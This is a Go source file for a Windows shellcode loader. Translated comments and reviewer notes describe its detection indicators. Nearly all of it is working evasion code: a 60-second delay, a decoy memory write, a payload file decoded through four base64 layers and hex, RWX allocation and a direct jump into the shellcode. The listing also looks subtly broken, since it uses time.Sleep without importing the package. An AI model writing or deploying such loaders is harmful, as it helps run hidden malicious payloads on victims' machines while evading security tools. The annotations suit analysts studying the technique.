package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"io/ioutil"
"os"
"syscall"
"unsafe"
)
// Win32 flag values passed to VirtualAlloc below.
// MEM_COMMIT|MEM_RESERVE reserves and commits the region in one call;
// PAGE_EXECUTE_READWRITE requests a writable AND executable mapping.
// NOTE(review): RWX private allocations followed by a direct jump into
// them are a classic loader pattern and a strong detection indicator
// (memory-scanning/EDR rules commonly key on exactly this combination).
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)
// Lazily-resolved Win32 procedures. MustLoadDLL/MustFindProc panic at
// package init if the library or export is missing, so this program only
// starts on Windows. (Original comments translated from Chinese.)
var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")           // load kernel32.dll
	ntdll         = syscall.MustLoadDLL("ntdll.dll")              // load ntdll.dll
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")  // resolve VirtualAlloc from kernel32.dll
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")   // resolve RtlCopyMemory from ntdll.dll
)
// checkErr prints err and terminates the process with status 1, unless
// err is nil or its text is the Windows "success" message. The success
// text is special-cased because syscall.(*Proc).Call always returns a
// non-nil error value (an Errno), even when the underlying call
// succeeded; comparing on the string is fragile (locale-dependent) but
// is what the original author chose.
func checkErr(err error) {
	if err != nil { // report errors surfaced by the memory API calls
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}
// Readcode returns the contents of "encode.txt" from the current working
// directory as a string. The file is the encoded payload this program
// loads; the original comment notes that a different file extension could
// be used to disguise it. On a read error a message is printed and the
// (empty) contents are still returned — the caller does not see the
// failure.
func Readcode() string {
	f, err := ioutil.ReadFile("encode.txt")
	// the payload file we need to load; other file formats could be used here for obfuscation
	if err != nil {
		fmt.Println("read fail", err)
	}
	return string(f)
}
// Base64DecodeString decodes str with the standard (padded) base64
// alphabet and returns the result as a string. The decode error is
// discarded, so malformed input yields whatever prefix was decoded
// before the error (possibly an empty string) rather than a failure.
func Base64DecodeString(str string) string {
	resBytes, _ := base64.StdEncoding.DecodeString(str)
	return string(resBytes)
}
// main is a payload loader: it sleeps, performs a decoy allocation, reads
// and decodes "encode.txt" (four base64 layers, then hex), copies the
// decoded bytes into an RWX region and transfers control to them.
//
// Behavioural indicators an analyst can rely on from this listing alone:
// a 60-second startup delay, two VirtualAlloc calls with
// PAGE_EXECUTE_READWRITE, RtlCopyMemory into those regions, and a direct
// call into the second region via syscall.Syscall. (Original comments
// translated from Chinese.)
func main() {
	time.Sleep(60 * time.Second) // presumably a sandbox/analysis-delay tactic; the author gives no reason
	// before loading the payload into memory, first push an unrelated string to confuse analysis
	var c string = "sgamfygyjffqrqwxzcvzxbsdwdqbsdbgagqwQWRQW/.OAUSHCNIADOdjfqwSFADOQIWOIJOGWEMPOSDPOOPasffvaSFAsafwfYRinJD3124651612qwrE02e"
	// call VirtualAlloc to request a block of memory (decoy region; its contents are never used)
	addr1, _, err := VirtualAlloc.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// call RtlCopyMemory to load it into memory
	_, _, err = RtlCopyMemory.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
	Str := Readcode()                    // load the encoded payload from encode.txt
	deStrBytes := Base64DecodeString(Str) // 4 rounds of base64 decoding (one here, three in the loop)
	for i := 0; i < 3; i++ {
		deStrBytes = Base64DecodeString(deStrBytes)
	}
	shellcode, err := hex.DecodeString(deStrBytes) // final layer is hex; decode error is not checked here
	// call VirtualAlloc to request a block of memory
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	// call RtlCopyMemory to load it into memory (done in two halves)
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)/2))
	_, _, err = RtlCopyMemory.Call(addr+uintptr(len(shellcode)/2), (uintptr)(unsafe.Pointer(&shellcode[len(shellcode)/2])), uintptr(len(shellcode)/2))
	checkErr(err)
	// use syscall to run the payload: execution is transferred to the RWX region
	syscall.Syscall(addr, 0, 0, 0, 0)
}